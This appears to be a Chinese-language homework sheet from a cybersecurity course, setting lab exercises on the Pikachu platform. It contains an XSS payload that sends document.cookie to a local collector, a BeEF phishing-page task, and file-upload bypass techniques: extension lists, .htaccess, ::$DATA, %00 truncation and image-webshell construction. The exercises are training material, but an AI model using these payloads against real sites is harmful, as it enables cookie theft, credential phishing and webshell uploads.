10

@所有人 网络安全C10-2024.10.19

作业：

1、XSS

（1）使用pikachu平台练习XSS键盘记录、前台XSS盲打攻击获取cookie，利用cookie实现登录

<script>document.write('<img src="http://127.0.0.1:80/pikachu/pkxss/xcookie/cookie.php? cookie='+document.cookie+'"/>')</script>

1. 使用beef制作钓鱼页面，克隆任意站点的登录页面并获取用户登录的账号密码

2、文件上传

（1）客户端绕过练习

1.js禁用 js f12后在f1

2.burp抓包后在该文件后缀

3.修改代码

1. 服务端黑名单绕过：给出.htaccess文件绕过的具体步骤
2. Content-type绕过

替换类型image/jpeg

image/png

image/gif

1. 特殊可解析后缀绕过

可使用.php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini等不在约束内的

3.大小写绕过

4点绕过

5空格绕过

6::$DATA绕过

6配合解析绕过

8使用.htaccess（当后缀名约束没有此时且1.mod_rewrite模块开启 2.AllowOverride All）

接下来就是先上传 .htaccess 文件，覆盖父目录对上传目录的影响，然后再上传 1.jpg 文件，

1. 服务端白名单绕过：%00截断绕过，要求虚拟机中搭建实验环境，分别实现GET、POST方法的绕过

00截断绕过

1. 文件头检查：分别利用3种制作图片马的方式实现上传绕过

1.copy /b xiong.jpg+1.php 4.jpg

2.直接burp抓包，在数据包中添加一句话木马

3.直接使用16进制工具在PHP文件的头部添加文件头

（5）二次渲染绕过